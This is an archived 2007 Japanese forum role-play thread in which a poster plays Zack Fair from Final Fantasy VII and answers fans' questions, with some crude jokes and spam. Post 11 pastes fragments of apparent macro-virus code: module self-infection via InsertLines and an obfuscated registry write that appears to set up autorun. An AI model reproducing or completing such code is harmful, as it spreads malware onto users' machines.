5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【FF7】ザックスだけど質問はあるのか?

1 :ザックス ◆fZJjtbCv9E :2007/10/26(金) 01:45:20
よろしくな!

2 :以上、自作自演でした。:2007/10/26(金) 01:47:21
セックスー!!!!

3 :以上、自作自演でした。:2007/10/26(金) 01:49:24
ポーションうめえ

4 :クラウド:2007/10/26(金) 01:54:44
あんまエアリスと仲良くするなよ、おれんだぞ

5 :ティファ:2007/10/26(金) 02:08:11
チンポコ散々なぶってからすり潰しちゃる

6 :ザックス ◆fZJjtbCv9E :2007/10/26(金) 02:10:17
>>2
何を叫んでいるんだ?少し落ち着いたらどうだ!?時間も遅いしな

>>3
ポーションは俺も飲んでるぞ!
すぐに回復できるすぐれものだ。俺には必需品だからな

>>4
クラウド来てくれたのか!また逢えてうれしいよ。
クラウドもエアリスを知っているのか?
エアリスは優しくていい子だよな!
今度、一緒に花売りにでも行くか?

7 :以上、自作自演でした。:2007/10/26(金) 02:15:54
ポーションの神羅缶を親に捨てられた・・・

8 :ザックス ◆fZJjtbCv9E :2007/10/26(金) 02:26:01
>>5
ティファ久しぶりだな!急に何を言ってるんだぁ?
いつものティファらしくないぞ!

>>7
親に捨てられてしまったのか?大事なものはきちんとしまっておかないと!
飲み終った缶じゃしかたないかもしれないが、
君にとっては大事な物だったはずなのに、残念だったな。

9 :以上、自作自演でした。:2007/10/26(金) 07:44:40
寂しいな…

10 :バレット:2007/10/27(土) 02:59:21
お前いい体しとるな!
俺と一緒にコレル一の炭鉱夫をめざさねえか

11 :以上、自作自演でした。:2007/10/27(土) 08:07:38
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

12 :ザックス ◆fZJjtbCv9E :2007/10/27(土) 22:11:25
>>9
寂しいか…何かあったのか?
俺は仲間だったアンジールやセフィロスがいなくなった時に、さすがに寂しいっていうか、なんていうか複雑な気持になったな
でも、カンセルやエアリスがいてくれたから、気持をまぎらわすことができたっけ…
少しでも寂しい気持がまぎれるんだったら、俺はいつでもここにいるから、また来てくれよな!

>>10
いい体してるって?うれしいことを言ってくれるねぇー!
日々の訓練のおかげで、俺もたくましくなってるってところかな。
ところで、俺が炭鉱夫に?って、さそってくれたのはうれしいけど、
俺が、日々厳しい訓練にも耐えているのは、英雄になるのが夢だから…ってことでごめんな!

>>11
ごめん!俺には何が言いたいのかわからない。
でも、また遊びに来てくれよ!

13 :以上、自作自演でした。:2007/10/28(日) 00:50:31
>>12
はよスレ乱立頼むわ
前回の倍の規模でな

14 :以上、自作自演でした。:2007/10/28(日) 22:36:13
ザックスはツンデレ娘で15歳好きですか?

15 :以上、自作自演でした。:2007/10/28(日) 22:58:24
つまんないスレだと人も来ないんだね

16 :以上、自作自演でした。:2007/10/28(日) 23:22:45
>>14-15
もっとスレ立てに精出せ王子

17 :クラウド:2007/10/29(月) 01:32:50
>>12
ザックス・・・あんたはもう頑張らなくてもいいんだ・・・・・

18 :食堂の男:2007/10/31(水) 07:22:52
・・・・・俺だ・・・

・・・ツォンはどうやら・・・・俺たちとやる気らしい

ああ・・分かってる・・・・アイツなりの考えだな・・・・・・・

・・・・・・それがタークスの選択か・・・


………ラ・ヨダソウ・スティアーナ

19 :以上、自作自演でした。:2007/10/31(水) 10:50:56
>17-18
どうしたの?
スレ立ての勢いが鈍ってるよ。

20 :以上、自作自演でした。:2007/10/31(水) 17:22:47
髪型を変えた時の心境は?

21 :ザックス ◆fZJjtbCv9E :2007/10/31(水) 19:35:46
>>13
前回ってどういうことだよ?俺はまだここに来たばかりだ。誰かとまちがってるんじゃないのか?
スレの乱立って…間違っても俺はそんなことをするつもりはないよ。

>>14
ツンデレ娘で15歳好きって、誰からの情報だよ!
もしかしてカンセルか!?俺はそんなこと一言も言った覚えはないぞ!

ツンデレって、ツンツンデレデレってやつだろ!?
俺もそれくらいは一応知ってるけど。
好きかっていわれると、そうでもないな…

22 :以上、自作自演でした。:2007/10/31(水) 19:38:30
おっ頑張ってんな

23 :ザックス ◆fZJjtbCv9E :2007/10/31(水) 19:39:18
>>15
わざわざつまらないスレだって、あんたは言いにきただけかよッ!
俺は来てくれる人がいる限り、返事はするつもりだし、のんびりやっていければいいと思ってる。
人の多さだけでスレの価値がきまるわけじゃないし。そんなことを言われたって俺は気にしないさ。

>>16
何かよからぬことをしてるんじゃないだろうな!?
ここに来てくれてる人を巻き込むなよ!?

>>17
クラウドまた来てくれたのか!うれしいよ!けど、がんばらなくていいってどういう意味だ?
俺は訓練でも、任務でも、すべてがんばってきたからこそ今があると思うんだ。だから、がんばるってことを忘れたくないんだ。
だから、そんなこと言わないでくれよな!
それとも…新旧交代ってことじゃあないだろうなぁ?
まだまだ俺だって現役だ!そこんところ忘れるなよ!

24 :ザックス ◆fZJjtbCv9E :2007/10/31(水) 19:42:55
>>18
タークスが動く?一体何があったんだ?
あんた達と戦うっていうのかよ?
ツォンからはまだ何も聞いてないが、シスネなら知ってるはずだから聞いてみるよ!
だから、馬鹿な真似だけはしないで、もう少し待ってくれよな!

>>19
またあんたか?一体、何をやっているんだ?

>>20
髪型を変えたのは、気分転換ってのもあるけど…
アンジールやセフィロスがいなくなって、頼れる人がいなくなったことが俺の中で一番大きかったことなんだ。
それで、今までの気分を一掃して、俺もアンジールやセフィロスのようでありたいと、
髪型を変えることで気合いを入れなおしたってトコかな。

25 :ザックス ◆fZJjtbCv9E :2007/10/31(水) 19:59:34
>>22
応援サンキュー!これからも任務に訓練にココと、がんばるつもりだ!
それに、仲間がどんどんいなくなる中で、
あんたみたいなコトを言ってくれる人がいてくれるだけで、勇気がわいてくるよ!
ありがとうな!

26 :クラウド:2007/10/31(水) 22:51:27
なぁ、スレを立てるだけ立てて、すぐFOするスレ主をあんたはどう思う?

27 :ルード:2007/10/31(水) 23:22:11
・・・・・・。

28 :以上、自作自演でした。:2007/11/01(木) 00:19:47
>>20-27
わかったから早くスレ乱立しろ

29 :以上、自作自演でした。:2007/11/01(木) 21:28:05
これが数十万本売れたゲームの主人公か?
人気なさすぎだろ…

30 :以上、自作自演でした。:2007/11/01(木) 22:16:36
「おいっ 目をあけろ!
死んじまっちゃ ダメだ!
「おまえと おれで 兵士長の座を
とりあうって 約束したろ!
おまえが 死んじまったら……
「おまえが 死んじまったら
おれが かんたんに 兵士長に
なっちまうぜ?
「それじゃ おもしろくないだろ?
そうだろ おい?
返事しろって おい!

31 :カンセル:2007/11/01(木) 23:57:32
とりあえずメール無視すんな

32 :ザックス ◆fZJjtbCv9E :2007/11/03(土) 23:52:27
>>26
クラウド、どうした?
そうだなぁ。俺としては、いろいろな事情があるんじゃないかと、思うけど…
急に忙しくなったとか、返事がみつからないとか
答えになってるかはわからないけど、来られなくなった理由は、本人にしかわからないことだから、難しいよな…
俺は、みんなが来てくれる限り、返事をしていくつもりでいるから。
クラウドも、いつでもココに来てくれよな!

>>27
ルード!久しぶりだな!
無口なのは知ってたけど、ココに来たときぐらい、何かしゃべったらどうだ?
それとも、俺とは話すコトがないとでも言いたいのか?
ってのは冗談で、レノは元気にしてるか?
そういえば、8番街がタークスの担当だったよな?
治安の維持、がんばってくれよ!
タークスだけじゃ無理なときは俺もでるからさっ!

>>28
あんたほんとしつこいな。ところで何がわかったんだ?
何度も言うけど、ココにいる人達を巻き込むのはやめてくれよ。
それより、自分で出来ることをしたらどうだ?

33 :ザックス ◆fZJjtbCv9E :2007/11/03(土) 23:55:05
>>29
人気がないとか言うなよなー。
少し寂しい気分になっただろ!?
まぁ、ココはゆっくりやっていければ俺としてはいいと思ってるんだ。
あんまり進みすぎても、返事を返すのが遅くなりそうだしな。
あんたも、また何かあったら、ココに来てくれよな!

>>30
おーい、俺はまだ生きてるって!
今でも得意なスクワットしながら元気に体を鍛えて、任務に備えてるよ。
俺の夢は英雄って、でっかいものだからな!
セフィロスに負けないくらい有名になってやるって、自分に誓ったんだ!
一緒にこれからも、がんばって行こうな!
>>31
カンセル!元気にしてたか?
俺はものすごく元気にしてる!
それより、いつもメールありがとな!カンセルにはいろんな情報や、うれしいメールなんかもいっぱいもらってたな。
でも、任務で忙しくてすぐにメールができなかったんだ。ちゃんとメールは読んでたし、無視してたわけじゃないんだ。
これからはメールの返事返せるようにするからさっ、これからもよろしくな!

34 :以上、自作自演でした。:2007/11/04(日) 17:11:19
クライシスコア買ったけどプレイする時間が無いよ…

35 :以上、自作自演でした。:2007/11/04(日) 23:07:31
374:ユフィ◆2cELVQk0F6 :2007/11/04(日) 20:47:55 [sage] >373
いいえ、私の出番はここまでです。
こんな風に成り下がってしまって…この先着いて行く人がいますか?私も着いて行きたくも修正したくもありません。
ザックス×ユフィを認めないと言いましたね?私達はまだ会ってもいないのに酷い妄想だわ。
いいえ、あなたがただの腐った女子でザックスと私の仲を許せないだけなのかも知れませんね、中の方?

あなたの近い未来、ライダーのように寒く空しいコテになる事でしょう。キャラハンではなくコテですね。
今後どうこちらを背負って行くかは分かりませんが、皆さんを飽きさせないよう頑張って下さい。
どうか飽きて逃げ出さないように。

他の皆さんにはこのような形で離れる事になり申し訳ありません。短い時間でしたが楽しかったです。


ではお願いしますね。クラウドさん…いいえ、ザックス。

36 ::2007/11/05(月) 01:29:11
腐女子きもいよ腐女子

37 :以上、自作自演でした。:2007/11/05(月) 01:35:14
コピペに↑とかどんだけ

38 :以上、自作自演でした。:2007/11/05(月) 01:39:57
今日初めてこのスレの存在知った

ザックスまだかな〜(・∀・)

39 :クラウド:2007/11/05(月) 22:08:41
ザックス・・・また逃げたのか?

40 :以上、自作自演でした。:2007/11/06(火) 10:56:57
クラウドの電話番号とメアドを100万ギルで売ってくれ

41 :クラウド:2007/11/06(火) 21:13:18
クックック・・・
黒マテリア・・・・・・

メテオ呼ぶ・・・

42 :ザックス ◆fZJjtbCv9E :2007/11/06(火) 23:16:40
>>34
そっか、プレイする時間がないだなんて、よっぽど忙しいんだな。
けど、あんまり無理はするなよ!?
俺は、今のところ任務をこなしながら、、体を鍛え、筋トレに得意なスクワットしながら、急に来る任務に備えてるよ。

それより早くプレイする時間がとれるといいな。
ゲームのラストは…
やってみればわかるか…

>>35
ユフィって、あのウータイのお宝泥棒ユフィか!
逢ったことがないなんて、言わせないぞ!もしかして俺のコトを忘れたわけじゃあないだろうな?

それより、腐った女子ってのは何なんだ?俺は男だっての!
それにユフィとは逢ったばっかりで、そんな仲じゃあないし…

けど、離れるってウータイから離れるってコトか?
あんなにウータイを守るって言ってたのに、もう少し考え直してみたらどうだ?

43 :ザックス ◆fZJjtbCv9E :2007/11/06(火) 23:19:13
>>36
さっきは腐った女子に、今度は腐女子って、いったい何なんだー?

ココはみんなで仲良くやっていきたいと俺は思ってるから、きもいとか言うのはやめてくれよ?

>>37
どっかのコピペなのはわかってたけど、ドコのなんだろうな?

>>38
待っててくれたのに遅くなってごめん!!
これでも俺は任務にひっぱりだこってやつで、結構忙しくてさっ。
それより、こんなに沢山のスレの中で、みつけてきてくれてありがとうな!

それに、待っててくれるのって、なんだかうれしい気分になるよ!
ってことで、これからもよろしくな!

44 :ザックス ◆fZJjtbCv9E :2007/11/06(火) 23:22:32
>>39
クラウド、また逃げたのか、なーんて言ったら、俺がしょっちゅう逃げ出してるみたいじゃないか!
俺は任務の時だって真っ先に敵に向かって行ってるっつーの!

そりゃあ、ソルシジャーになりたての頃は多少…ってこともあったけどな。
今ではビビることなく突っ込んで行くのが俺かな。
ってことを覚えておいてくれよ?
それとも俺がココから逃げ出すとでも思ったのか?

>>40
100万ギルかぁー。ってのは嘘で、大金積まれたって、教えられないよ。
こっちにも個人情報ってのがあるわけで…
それにお金には困ってないというか、戦えば戦うほどお金は入ってくるから、何とかなるっていうのが本音かな?
それよりクラウド本人に聞いてみたらどうだ?

ってか、俺のは聞きたくないのかよっ!
まぁ、こんなこと言ってみたけど、俺のも教えないけどな。

45 :ザックス ◆fZJjtbCv9E :2007/11/06(火) 23:24:26
>>41
メテオを呼ぶだって?そんなことしたら、危ないだろうが!
じゃあ、こっちはホーリーで対抗するぞ!

ってのは冗談で、クラウドとは戦うつもりはないし、訓練っていうならやってもいいけどな
アンジールもセフィロスもいなくなった今じゃあ、俺とまともに訓練できるやつがいなくってさ。
たまには、クラウドとやるのもいいかもな!

46 :以上、自作自演でした。:2007/11/07(水) 13:26:03
ザックスの尻ゲッツ。


47 :以上、自作自演でした。:2007/11/07(水) 13:31:41
ゴンガガ犬おいでおいでチッチッチッチ。
お座り!お手。おかわり。伏せ。待て。ちんちん。
よしよし。
フリスビーで遊ぶか?

それっ  つ【皿】

48 :以上、自作自演でした。:2007/11/07(水) 17:04:53
お、ゴールまで頑張れよ!

49 :ザックス ◆fZJjtbCv9E :2007/11/07(水) 23:36:13
>>46
尻ゲッツするのはかまわないが、おさわりはよしてくれよ?
一瞬、後ろをとられたのはソルジャーとしてどうかと思ったけど、
ココじゃあ仕方ないもんな!

>>47
わんわんっ!って、何やらせるんだよ!
しかも、フリスビーじゃなくて皿かよ!?
落としたら危ないだろ!
ってか、俺に言ってるのかと思ったじゃないか!

それより、ゴンガガは俺の故郷なんだけど、知ってるのか?
なんだか、懐かしいこととか思い出してきたよ。
ソルジャーになってからはほとんど帰ってないけど、のーんびりとした田舎で、とてもいいトコだよゴンガガは。
あんたも行ってみるか?

>>48
ゴールかぁー。まだまだ先だけど、あんたみたいに応援してくれる人がいるのは、すごく有り難いコトだよな。
それに、なんだか力が湧いてくるよ!
どこまでいけるかわからないけど、応援サンキューな!
とりあえずゴール目指してがんばってみるよ!

50 :クラウド:2007/11/07(水) 23:48:47
ザックス・・・今回は早かったな。忙しいのはわかるがあまりこないようだと、ここがクラウドだらけになってしまう

51 :以上、自作自演でした。:2007/11/08(木) 00:25:55
ねぇザックス
バスターソードってどれくらい重いの?

とりあえず頑張ってね〜
応援する

52 :エアリス ◆A4jsQTgi.Q :2007/11/08(木) 03:30:58
ワゴン、いっぱい作ってくれてありがとう。
でも…やっぱり一緒じゃなきゃ、さみしいよ……

53 :以上、自作自演でした。:2007/11/08(木) 10:03:41
ザックスの毛を一本下さい。

54 :クラウド:2007/11/08(木) 10:37:27
興味ないね

55 :以上、自作自演でした。:2007/11/08(木) 10:42:17
中の人は女ですか?

56 :以上、自作自演でした。:2007/11/08(木) 10:57:44
ザックスは動物っぽい
自然に溶け込んでそう。
昨日からデスクトップを青空にしてみたよ。
快晴いいなぁ。

57 :以上、自作自演でした。:2007/11/08(木) 11:27:09
昨日店でZのポーションが売ってたから衝動買いしてしまった
個人的にセフィロスかクラウドの缶がほしかったがなかったのでユフィにした
味は普通に美味かったな、流石都会のポーションは一味違う
ザックス達も戦闘中はこんな炭酸入りを飲んでるのか?
ちなみに、イヴァリース地方のポーションはすごいぞ
何がすごいかって?飲んでみればわかるよwww

58 :クラウド:2007/11/08(木) 14:42:11
ウへへへへ・・・
俺は何をした!

59 :以上、自作自演でした。:2007/11/08(木) 18:46:25
ミニチュアザックス一匹欲しいお。
毎日なでこなでこして可愛がるお。

60 :以上、自作自演でした。:2007/11/08(木) 20:16:10
ザックス、あんたなんでそんなに良い奴なんだ?
どうやったらそんなに性格良くなるのか教えてくれ
仲間のために最後まで頑張ったあんたすごいよ、まじで

61 :以上、自作自演でした。:2007/11/08(木) 20:45:18
俺ならクラウド放置してエアリスにかくまってもらうw

62 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:17:11
>>50
今回は時間があったからな!
もっとコンスタントに来れればいいんだけど、
俺も任務で忙しい時があるんだよ。ごめんな!
来れる時にはちゃあんと来るからさっ
それまで待っててくれよな!

ところで、クラウドだらけになるってどういうことだよ?
それより、いつも来てくれて、ありがとな!

>>51
バスターソードの重さかぁー。そうだなぁ。例えるとしたら、
大きな丸太を振り回してるって言ったらわかりやすいかな?

重量がある分、戦いの時には、降り下ろしたバスターソードは結構な威力を発揮してくれるんだ。
重さに慣れるのに最初は少してこずったけどな。

それより、あんたも応援ありがとな。
あんたの応援で、まだまだがんばれる気がするよ!
これからもよろしくな!

>>52
エアリス来てくれたのか!

ミッドガルはお花でいっぱい、財布はお金でいっぱい計画だもんな!
そんなコトを俺が言ってたのに、一緒に花売りできなくてゴメンな!

ワゴンの調子はどうだ?
なんとか造ってみたけど、次は、もっとすごいのを造ってやるからな!
それに、さみしい思いはさせないように必ず時間はとるから、また、一緒に花売りしような!

63 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:18:48
>>53
毛を一本くださいだって?
俺の毛を一体どうしようっていうんだ?
変なことに使わないなら一本くらいやってもいいけど…
結構、髪の毛はサラサラな方で、わりと自信あるんだ!

>>54
クラウド、急に興味ないねってどういうことだ?
ってか、クラウドの口癖かな?
それに、クラウドがさっき言ってた、クラウドがいっぱいってこのコトか?
しかも興味ないとか言いながらココに来てるじゃないか!
それとも、俺に興味がないってコトかよ!?

>>55
中の人って何なんだ?
それよりも、俺は俺で、どっからどうみても男だろ!

まさか、俺も気付かないところで女っぽい仕草でもしてるって言うのか…?
そんな風に言われたのは初めてだぞ!
女だなんて言われないように、もっともっと訓練して体を鍛えて、男らしくならなきゃだな!

64 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:20:54
>>56
俺が動物っぽい?
そうだなぁー。やっぱり故郷が田舎で、自然と触れ合って過ごしてきたからかもしれないな。
動物に例えると、俺って何だろうな?

ところで、デスクトップを青空にしたって?
晴れた日の青空ってすごく気分がいいし、爽やかな気分になるよな!
訓練してるトキも青空が広がってると、やる気もでるし、ポカポカ陽気の晴れっていいよな!

>>57
ポーションは俺にとって、必需品で、いつも飲んでる!
それに炭酸が入ってて、スッキリさせてくれる飲み物だな。
俺が飲んでるのは、味は全て同じだけど…
それより、場所によって味が違うのは知らなかったな。今度飲んでみるよ。

ところで…クラウドかセフィロスの缶が欲しかっただなんて、あんたは俺の缶はどうでもいいのかよ!?
別に、気にしてるわけじゃあないけどさっ!
やっぱ英雄セフィロスは人気があるんだなー。

俺も英雄になるって夢を忘れずに、これからもがんばるぞ!

65 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:23:07
>>58
クラウド、また来てくれたのか。

でも、ウヘヘヘへって…気分でも悪いのか?いつものクールな感じと違うな。
それに、何をしたのか覚えてないなんて、
一体何があったんだ?

まさか、また魔晄中毒にでもなったんじゃないだろうな?
魔晄も浴びすぎると体に影響が出るから気を付けろよ?

>>59
ミニチュアザックスって俺は犬かぁ?
なでこなでこして可愛がるだなんて、ちょっと恥ずかしいだろ!?

ってか、ミニチュアダックスはちっちゃくてかわいい犬だよなぁー
俺も犬が欲しかったんだけど、ちゃんと犬のお世話ができるのかって話になって、
飼うことができなかったんだよなー
それに散歩もしなきゃいけないだろ?
今じゃあ、任務が忙しくて、飼える状況じゃあないしな。
もしあんたが犬を飼うんだったら、俺にも触らせてくれよな!

66 :以上、自作自演でした。:2007/11/08(木) 21:26:14
おっ頑張ってんな

67 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:26:58
>>60
そんなに誉められると照れるじゃないかよ!
それに、良い奴だなんて、うれしいこと言ってくれるなぁー。あんたは。

俺の性格が良いかは自分ではわからないし、良くなる方法もわからないけど…
でも、本当の仲間が、大切な人がピンチに陥ってたら、命がけで助けるのが男ってものじゃないか?
どんなに厳しい状況にだって、仲間はほっとけないし。
そういうもんだろ?

それに、アンジールにはソルジャーとしての誇りを忘れるなってよく言われたっけ。
だから、どんなことでも最後まで諦めずに、がんばることを忘れなければ、俺はそれでいいと思うよ!

>>61
クラウド放置って、あの状況でそんなことできるはずないだろ?

かくまってもらうのも、一つの案だが、逆に言えば、エアリスにも迷惑がかかってしまうじゃないか!
そうでなくても、古代種の生き残りってやつで、いろんな奴にねらわれてるし。まぁ、タークス…ツォンも守ってくれてるから大丈夫だと思うけど。

それに、自分に向かってきた火の粉は自分で振り払わなきゃ、俺達ソルジャーは生き残れないからな…

68 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:34:27
>>66
すごいタイミングで来たな!
ちょっとビックリしたよ。
もしかして、前にも来てくれたのと同じ人かな?
これからもココで頑張るつもりだから、応援よろしくな!

69 :以上、自作自演でした。:2007/11/08(木) 21:37:03
ねぇねぇ ユフィどう思う?

70 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 21:52:17
>>69
そうだなー。ユフィは俺にとって、お宝泥棒っていうイメージしかないけど、
女の子なのにウータイを守り、復興させようだなんて、それなりに夢を持って頑張ってる子だと思うよ!

もう少し、おとなしくしたほうがいいと、ちょっぴり思うけど…元気があって、いい子かな?

71 :クラウド:2007/11/08(木) 21:55:01
ザックス・・・クラウドだらけになるってこういうことだ。
ほら、いろんなクラウドがきてるだろ?でもみんな腕には番号が・・・・・・

72 :ザックス ◆fZJjtbCv9E :2007/11/08(木) 22:06:36
>>71
おいおい、ちょっと待てって、クラウドは一人だけだろ?
腕に番号があるだなんて、初めてきいたし、クラウドのクローンでもいるっていうのかよ?

たしかにクラウドは何回もココには来てくれてるけど俺はクラウド一人しかみたことないぞ!
もしかして俺をからかってるのか?
ならいいんだけどさっ!

73 :ジェネシス:2007/11/08(木) 22:18:02
>>72
その余裕、いつまで持つかな!

74 :以上、自作自演でした。:2007/11/08(木) 23:05:52
きゃ〜ザックス〜(黄色い声援)

75 :以上、自作自演でした。:2007/11/08(木) 23:18:45
FF7ではよくわからんかったがCCやってザックス好きになった

とりあえず、頑張れよ〜

76 :以上、自作自演でした。:2007/11/08(木) 23:52:11
前にスレ発見して来た人だけど、今回もタイミング逃した・・・orz

クラウドだらけよりも、チョコボに囲まれてモフモフしたいよね

77 :以上、自作自演でした。:2007/11/09(金) 00:13:25
クラウドの髪は硬くて痛そうだしな
モーグリもいいかもしれない

78 :以上、自作自演でした。:2007/11/09(金) 00:23:25
いやいや、ザックス来過ぎなくらいよくやってると思う
オレも会社のデスクトップ青空にしてるw
ザックスフェアいいよな。

79 :以上、自作自演でした。:2007/11/09(金) 00:26:47
ザックスおやすみ。
子犬はよく寝てよく学んでよく育てよ。


80 :エアリス ◆A4jsQTgi.Q :2007/11/09(金) 01:20:42
>>62
ううん、わがまま言って、ごめんね。
ワゴン、順調だよ。2番目に作ってくれたのが、お気に入り。
3番目のは、ちょっと恐くて、使えない…かな。
今度帰ってきたら、青空の下で、お花、たくさん売ろうね。

おやすみ、ザックス…
今日は夢で、会えるかな…

81 :以上、自作自演でした。:2007/11/09(金) 01:29:19
最近ザックスの事が好きすぎて困ってるんだけど
どうしてくれる!?

82 :以上、自作自演でした。:2007/11/09(金) 16:10:10
エアリス ◆A4jsQTgi.Q  は名無しにもレス返せよ
ザックス目当ての婦女子バロス


83 :以上、自作自演でした。:2007/11/09(金) 16:43:01
悲壮チャソエアリス
誘い受けすぎてイタイ。
口調からして間違ってる。
鳥つけるくらいならちゃんとやれ。

84 :以上、自作自演でした。:2007/11/10(土) 06:50:24
まぁ、そう言ってやるな

85 :ザックス ◆fZJjtbCv9E :2007/11/10(土) 22:26:30
>>73
ジェネシス!今までドコに行ってたんだ?
アンジールもセフィロスもいなくなって大変だったんだぞ!

そういえば、バノーラ村まで行ってきたよ。
バカリンゴ、いっぱいなってたな。それに自然がいっぱいで、いい村だったよ。

それより、みんながいなくなってから、忙しくて俺にはそんなに余裕なんかなかったんだぞ。
また、戻ってきてくれるよな?
俺はいつまでも待ってるからさ。

>>74
声援サンキュー!

そういえば、ジェネシスにはファンクラブがあるし、セフィロスは英雄で、かなりの人気者だから
俺には声援や応援してくれる人が今まではいなかったけど、
ココではみんながよくしてくれて、すごくうれしく思うよ!

これからも応援よろしくな!

>>75
好きになっただなんて、ちょっと照れるだろ!?

でも、応援してくれるってのはすごくうれしいよ!
ありがとうな!
まだまだココに俺はいるから、いつでも遊びに来てくれよな!

86 :ザックス ◆fZJjtbCv9E :2007/11/10(土) 22:29:09
>>76
前にスレ発見したって言ってくれた人か!
また来てくれて、ありがとう!
時間が取れる時は、少しココにいるようにするから、また、懲りずに来てくれよな!

それよりチョコボ、かわいいよな!
フワフワな羽で、乗り心地も抜群なんだよ。
いろんな所にチョコボで行ったコトがあるけど、
すごいスピードだから、最初はヒヤヒヤさせられたなぁ。
今ではチョコボに乗っても、景色を見る余裕もでてきたし。
チョコボに囲まれて、モフモフかぁー。きっと、すごく気持がいいぞ!

77
モーグリはフワフワっていうより、プニプニしてて、柔かいかんじかな?
あの頭のアンテナみたいのがモーグリのかわいいトコかな?

ってか、クラウドの髪型はツンツンしてるから、
触ったらたしかに痛そうだよな。

けど、クラウドの髪の色は綺麗な色だなぁと、黒髪の俺はちょっとだけうらやましいなって思うよ。
でも、俺はあの髪の色は似合わなそうだよな…

87 :ザックス ◆fZJjtbCv9E :2007/11/10(土) 22:31:01
>>78
よくやってるだなんて、ありがとうな!
時間があるときは、ちゃんとココに来るつもりだから。
待っててくれよな!

ところで、あんたもデスクトップを青空にしてるのかぁー。
もしかして青空って流行ってるのか?
俺も青空のいい写真があったら、デスクトップにしてみようかな?

ところで、ザックスフェアってなんだ!?ヘアーのことか?
間違ってたらごめん。
でも、結構お気に入りの髪型なんだ。
前髪上げて、少し大人っぽくしてみたんだけど、どうかな?

>>79
子犬って…俺って、そんなにガキっぽいかなぁ?
そういえばアンジールにもそんなコトを言われたような気がする…

でも、髪型を変えて、少しだけ俺としては大人っぽくなったつもりでいたんだけどな。
まぁ、中身は相変わらずだけど!

それに、俺はよく寝てるし、訓練もばっちりこなしてるから大丈夫だよ!
でも、まだまだソルジャーとして学ぶコトはすごく多いいよ。
これからも、ソルジャーの誇りを持って、戦っていくつもりだから…

それより、遅くなったけど、おやすみ!
いい夢が見れるといいな!

88 :ザックス ◆fZJjtbCv9E :2007/11/10(土) 22:38:44
>>80
エアリス、わがままだなんて思ってないよ。
けど、俺が言い出したコトなのに、約束守れなくて本当にゴメン!

でも、ワゴンの調子がよくてよかった!
壊れていないか心配だったんだ。

それより、青空の下で花売りするのも、気分がよさそうだな。
前に空が恐いって言ってたけど、俺がついてるから安心してくれよな。
必ず、青空の下で一緒に花売りしような!

>>81
好きすぎるだなんて、恥ずかしいじゃないかよ!
あんたこそ、どうしてくれるんだ?

俺はココに来てくれるみんなが好きだし、来てくれて、すごい感謝してるよ!
ココに来るのが俺の楽しみの一つになっているんだ。
あんたもそうだし、来てくれるみんなが、すごく優しいからな。
まだ始まったばかりのココだけど、これからもよろしくな!

89 :ザックス ◆fZJjtbCv9E :2007/11/10(土) 22:42:30
>>82
おーい。女の子にそんな言い方はないんじゃないのか?
前にも言ったけど、ココではみんなで仲良くやっていきたいと俺は思ってるんだ。
それに言いたいコトがあれば、俺に言ってくれてもかまわないし、
ココはちゃあんと俺が守るから…あんたなら、分かってくれるよな?

これからも、みんなで楽しくやっていきたいから、あんたもまた、来てくれよな!

>>83
上でもいってるけど、ココでは楽しくやっていきたいんだ。
だから、あんたにも分かってもらいたいな!

それに、話なら俺が聞くからさっ。
あんたも、分かってくれるだろ?
だから、これからもよろしく頼むよ!

>>84
フォローサンキューな!

ココはみんな優しい人ばっかりで、色々助けてもらってるし、
すごく居心地がいいトコだと思うよ!
。俺は、これからもがんばるから、
また来てくれよな!

90 :以上、自作自演でした。:2007/11/10(土) 23:08:56
くっ、オレとした事が手傷をおっちまった…深いなこりゃあ…

91 :ジェネシス:2007/11/11(日) 00:44:52
>>89
約束のない明日であろうと
君の立つ場所に必ず舞い戻ろう
星の希望の雫となりて
地の果て 空のかなた
はるかなる水面


ひそかなる牲となろう

92 :以上、自作自演でした。:2007/11/11(日) 19:20:27
そのベルト腹にきつくないか?
かがんだ時とか、おぅえっ!!ってなるだろ。

93 :以上、自作自演でした。:2007/11/11(日) 19:24:56
おまいら、これなら誰でも出来るぞw
http://page4.auctions.yahoo.co.jp/jp/auction/d80751387

94 :以上、自作自演でした。:2007/11/12(月) 07:09:27
俺も強くなりたい

95 :以上、自作自演でした。:2007/11/12(月) 15:31:58
髪のセットに毎朝どれくらい時間かけんの?

96 :以上、自作自演でした。:2007/11/12(月) 18:25:30
クラウドのスレが荒れてるから、
親友ならなんとかしてやってくれ、と言いたかったが、
必要なくなったみたいだ。
でもこれからザックスが苦労しそうな気がするから
最後まで何があっても頑張れ、と言っておく。

質問はそうだなー。
スクワット最高何回よ?
スクワットで死人が…ってニュースあったから気をつけろよ。

97 :以上、自作自演でした。:2007/11/13(火) 10:36:03
ザックス様に清き一票を
http://www.gpara.com/special/event/ranking/character07/male_100.php

98 :以上、自作自演でした。:2007/11/13(火) 16:15:44
0時に地獄通信してみれば?

99 :ザックス ◆fZJjtbCv9E :2007/11/13(火) 23:02:26
>>90
おいおい、大丈夫か?
傷口を見せてみろ!
結構傷は深いが、とりあえずこのポーションを飲めば傷も体力も回復するから…

それよりその傷はどうしたんだ?
あんまし無茶せずに、ソルジャーの俺にまかせといて、
あんたは後ろにさがっていろ、後は俺がやる!!

>>91
ジェネシス、また来てくれたのか。
あれって、LOVELESSだよな。

俺は読んだことがないから、ジェネシスから聞いた部分しかわからないんだ。
俺も、時間があったら読んでみるよ。
でも、俺には理解できそうにないんだよな…
なんだか詩のような感じで難しそうだし。

そういえば、アンジールやセフィロスも、ジェネシスから聞かされて覚えたとか言ってたっけ。

>>92
